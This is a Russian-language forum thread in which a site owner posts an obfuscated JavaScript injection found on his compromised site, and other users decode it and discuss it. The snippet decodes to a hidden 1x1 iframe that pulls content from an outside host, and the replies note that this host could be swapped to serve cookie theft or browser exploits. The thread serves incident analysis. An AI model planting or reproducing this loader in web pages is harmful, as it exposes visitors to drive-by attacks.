Попытка взлома моего сайта:в чем суть скрипта

[Aza~Lord]

Попытка взлома моего сайта:в чем суть скрипта

На один мой сайт взломщики поместили следующий скрипт. Расшифровать мне не удалось - что же он делает. Пробывал выводить содержимое в окно - получаются квадраты. Тем не менее он как-то пытается залить экзешники на мой винт.
Может у кого будут идеи - что тут собственно происходит?

<!-- ~ --><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!101!100!109!105!111!46!105!110!102!111!47!116!100!115!47!105!110!46!99!103!105!63!50!34!32!119!105!100!116!104!61!34!49!34!32!104!101!105!103!104!116!61!34!49!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT><!-- ~ --><br />

 

[...:::Alex:::...]

жгут

 

[Ferox]

Подгружает на твой сайт содержимое с урла: edmio.info/tds/in.cgi?2

Оттуда приходит код:

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='https://google.com'">
</head>
<body>
document moved <a href="Посилання видалено">here</a>
</body>
</html>

Который перенаправляет браузер пользователя на гугль. Хотя конечно в любой момент код приходящий оттуда может быть заменен, и он будет (к примеру) красть куки пользователя, или пытаться эксплойтировать уязвимости в его броузере.

 

[Aza~Lord]

Подгружает на твой сайт содержимое с урла: edmio.info/tds/in.cgi?2[BR/]
[BR/]
Оттуда приходит код:[BR/]
[BR/]
<html>[BR/]
<head>[BR/]
<meta http-equiv="REFRESH" content="1; URL='https://google.com'">[BR/]
</head>[BR/]
<body>[BR/]
document moved <a href="

⚠ Тільки зареєстровані користувачі бачать весь контент та не бачать рекламу.

[BR/]
</body>[BR/]
</html>[BR/]
[BR/]
Который перенаправляет браузер пользователя на гугль. Хотя конечно в любой момент код приходящий оттуда может быть заменен, и он будет (к примеру) красть куки пользователя, или пытаться эксплойтировать уязвимости в его броузере.

Сенк, можешь раскрыть секрет - как это вычислил? Отследил фаерволом? Или как-то расширфовал цифры?

 

[Ferox]

Напиши в скрипте вместо document.write просто alert

 

[BFG-9000]

Я бы лучше задался вопросом КАК взломщики разместили на твоем сайте скрипт???

 

[Flamming Hot]

Я бы лучше задался вопросом КАК взломщики разместили на твоем сайте скрипт???

Да легко. Я уверен чел использует т.н. shared hosting и скорее всего SQL, к нему обычными инжектами вломились и все